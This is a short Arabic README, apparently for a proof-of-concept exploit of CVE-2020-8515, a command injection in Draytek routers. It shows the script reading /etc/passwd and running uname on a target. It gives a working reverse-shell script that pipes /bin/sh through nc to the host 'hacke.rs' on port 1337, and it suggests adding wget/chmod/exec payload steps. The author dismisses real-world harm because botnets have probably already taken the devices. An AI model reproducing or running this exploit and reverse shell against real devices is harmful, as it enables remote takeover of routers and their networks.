
استغلال إثبات المفهوم لـ CVE-2020-8515 لحقن الأوامر في أجهزة توجيه Draytek. يتضمن استغلالًا آليًا وتسليم قشرة عكسية وتكاملًا مع قوالب فحص nuclei.
Draytek CVE-2020-8515 PoC كنت أحتفظ به.
المضحك أن الأمر المحقون يُنفَّذ مرتين، انظر هنا:
$ ./draytek.py draytek.local
(>) executing command: cat /etc/passwd
(+) vulnerable!
(>) executing command: uname -a
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
كان لدي بعض الخطط لتحسين هذه الأداة بشكل جيد، ولكن بصراحة، لقد مر عام وأنا لا أتذكر ما كانت تلك الخطط، لذا ها هو. ليس من الصعب إضافة بعض أوامر wget/chmod/exec إلى هذا، فقط انظر في دالة "do_stuff".
إذا قمت بتنزيله باستخدام wget وقمت بتشغيل سكريبت مثل التالي، ستحصل على شل عكسي:
#!/bin/sh
HOST="hacke.rs"
PORT=1337
rm -f /tmp/a; mkfifo /tmp/a; nc $HOST $PORT 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a
أعتقد أنه يمكنك أيضاً تحميل مثل هذا السكريبت عبر echo إذا تمكنت من تجاوز الأحرف السيئة في الحقن، ربما سأضيف ذلك لاحقاً - مشكلة التنفيذ المزدوج تجعل ذلك مرهقاً بعض الشيء. في الوقت الحالي، هذا نصف مكتمل، "المستخدم يقرر".
لن يسبب هذا الاستغلال ضرراً كبيراً في العالم الحقيقي (ITW)، فجميع الأجهزة المعرضة لهذا ربما تم استغلالها بالفعل من قبل بوتينات DDoS للمبتدئين.
للمسح الضوئي: استخدم قالب nuclei الذي صنعه شخص ما